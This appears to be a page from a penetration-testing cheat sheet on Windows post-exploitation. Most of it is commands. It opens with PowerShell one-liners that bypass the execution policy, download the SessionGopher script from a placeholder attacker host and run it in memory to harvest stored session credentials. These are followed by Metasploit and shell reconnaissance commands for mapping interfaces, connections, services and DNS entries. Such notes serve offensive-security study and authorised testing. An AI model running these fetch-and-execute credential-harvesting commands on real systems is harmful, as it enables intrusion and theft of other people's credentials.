Post Exploitation

Windows

Harvest credentials with SessionGopher

# Download and run SessionGopher from memory
powershell.exe -nop -ep bypass -C iex (New-Object Net.WebClient).DownloadString('http://<attacker ip>/SessionGopher.ps1'); Invoke-SessionGopher

# Dig deeper
powershell.exe -nop -ep bypass -C iex (New-Object Net.WebClient).DownloadString('http://<attacker ip>/SessionGopher.ps1'); Invoke-SessionGopher -Thorough

Retrieve useful information with Metasploit

# Retrieve available network interfaces
ifconfig

# List available devices using ARP
arp

# Check out the routing table
route

# List active network connections
shell
netstat -ano

# List running services
shell
wmic service where started=true get caption

Mapping the network

# Display DNS entries
ipconfig /displaydns

PreviousPrivilege Escalation NextWeb Stuff

Last updated 10 months ago

hashtagWindows

Windows